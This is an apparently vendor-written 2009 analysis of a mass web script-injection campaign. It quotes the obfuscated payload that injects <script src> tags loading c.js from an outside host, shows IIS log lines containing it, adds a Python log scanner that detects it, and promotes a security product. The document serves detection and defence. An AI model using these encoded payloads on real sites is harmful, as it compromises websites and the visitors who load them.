A complete solution to the com/c.js malicious script injection


A new mass script-injection engine has recently appeared. A Google search for com/c.js shows about 16,200 sites carrying the injected script.

The findings of the analysis by Security Umbrella (安全傘) are as follows:

The injection engine uses web crawling to submit the injection code over and over. The main form is %D3%AA%D1%F8<script%20src=http://3bomb.%63%6Fm/c.js></script>

with the middle part constantly mutated:

<script%20src=http://3b%6F%6Dbcom/c.js></script>

<script%20src=http://%33bomb.com/c.js></script>

The IIS logs look like this:

2009-01-20 09:18:25 W3SVC9 221.130.199.26 GET /xueyuan/list2.aspx name=%b2%df%c2%d4%3cscript+src%3dhttp%3a%2f%2f3b%256F%256Db.com%2fc.js%3e%3c%2fscript%3e 80 - 72.30.142.159 Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) 302 0 0

2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/0a5d18e3-3018-47a2-ac57-99909ce5c58a.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /xcg/images/top_search.jpg - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/new_34528523.jpg - 80 - 116.5.162.127 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/510be59b-07fd-4868-87b7-d3cbc677f3a7.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/86181994-719e-440e-abc6-2e7e834b3ebc.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/2e60e9fe-1fa1-495d-8a64-d21a73ec1099.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/db7ed03e-0308-4a0f-9e82-86552f350f2f.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/221d7e7d-2e21-4cb2-a496-1c7627f200f9.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/e9928c0c-d27f-45ba-b873-09bbde17f58e.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/10364b4a-5dde-4d6d-a9e7-17efaf3983d4.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0

2009-01-20 21:07:14 W3SVC9 221.130.199.26 GET /food/List.aspx Title=%BD%A1%BF%B5<script%20src=http://3b%6F%6Db.com/c.js></script><script%20src=http://%33bomb.com/c.js></script> 80 - 202.160.179.83 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 302 0 0

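The trojan injects its script through cookies, GET and POST, and uses search engines to find and inject sites automatically, which gives it a somewhat worm-like character.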
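The following Python is an added example, not code from the article or from the Security Umbrella product. It percent-decodes each request field until it stops changing and then looks for an injected `<script src>`, so the mutated and double-encoded forms in the logs above all reduce to the same host. The field positions are assumed from the excerpts, and the sample lines are shortened copies of them with the user agent replaced by `UA`.

```python
import re
from urllib.parse import unquote_plus

# Field positions assumed from the excerpts (the page shows no #Fields header):
# date time s-sitename s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip ...
STEM, QUERY, CLIENT_IP = 5, 6, 9

SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)
HOST = re.compile(r"^[a-z][a-z0-9+.-]*:/+([^/?#]+)", re.I)

def normalize(value, max_rounds=5):
    """Percent-decode until stable, so %256F -> %6F -> o (double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return a finding for a log line carrying an injected <script src>, else None."""
    fields = line.split()
    if line.startswith("#") or len(fields) <= CLIENT_IP:
        return None
    hosts = set()
    for raw in (fields[STEM], fields[QUERY]):
        for src in SCRIPT_SRC.findall(normalize(raw)):
            m = HOST.match(src)  # tolerates the single-slash "http:/" seen in the stems
            hosts.add((m.group(1) if m else src).lower())
    if not hosts:
        return None
    path = normalize(fields[STEM]).split("<")[0]
    return {"client": fields[CLIENT_IP], "path": path, "hosts": sorted(hosts)}

def scan(lines):
    return [f for f in map(scan_line, lines) if f]

# Shortened copies of four log lines from the excerpts; the user agent is replaced by "UA".
SAMPLE = [
    "2009-01-20 09:18:25 W3SVC9 221.130.199.26 GET /xueyuan/list2.aspx name=%b2%df%c2%d4%3cscript+src%3dhttp%3a%2f%2f3b%256F%256Db.com%2fc.js%3e%3c%2fscript%3e 80 - 72.30.142.159 UA 302 0 0",
    "2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 UA 302 0 0",
    "2009-01-20 21:07:14 W3SVC9 221.130.199.26 GET /food/List.aspx Title=%BD%A1%BF%B5<script%20src=http://3b%6F%6Db.com/c.js></script><script%20src=http://%33bomb.com/c.js></script> 80 - 202.160.179.83 UA 302 0 0",
    "2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /xcg/images/top_search.jpg - 80 - 221.239.165.30 UA 200 0 0",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```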

Security Umbrella (安全傘) 2009 Enterprise Edition can effectively deal with this kind of disguised injection.

Official download: http://safe3wp.safe3.com.cn/download.htm
